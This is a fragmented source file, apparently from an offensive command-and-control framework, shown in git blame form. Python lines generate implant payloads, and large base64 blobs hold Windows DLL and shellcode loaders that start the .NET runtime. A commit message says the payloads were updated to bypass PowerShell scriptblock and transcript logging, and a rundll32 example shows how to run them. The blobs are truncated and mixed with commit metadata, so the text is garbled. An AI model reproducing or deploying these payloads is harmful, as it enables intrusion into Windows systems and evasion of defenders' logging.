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
Initial Commit
2018-07-23 08:55:15 +00:00
self.PatchDll("%sPosh_v4_x86.dll" % name, v4_86, 0x00012F80, "DLL")
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v4_64 = "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
self.PatchDll("%sPosh_v4_x64.dll" % name, v4_64, 0x00014F00, "DLL")
Initial Commit
2018-07-23 08:55:15 +00:00
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "RunDLL Example:"+Colours.GREEN )
self.QuickstartLog( "rundll32 Posh_x64.dll,VoidFunc" )
def CreateShellcode(self, name=""):
# Load CLR "v2.0.50727"
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Shellcode that loads CLR v2.0.50727"+Colours.GREEN )
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v2_86_offset = 0x000130E0 + 4
v2_86 = "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
Initial Commit
2018-07-23 08:55:15 +00:00
self.PatchDll("%sPosh_v2_x86_Shellcode.bin" % name, v2_86, v2_86_offset, "Shellcode")
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v2_64_offset = 0x00015150 + 8
v2_64 = "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
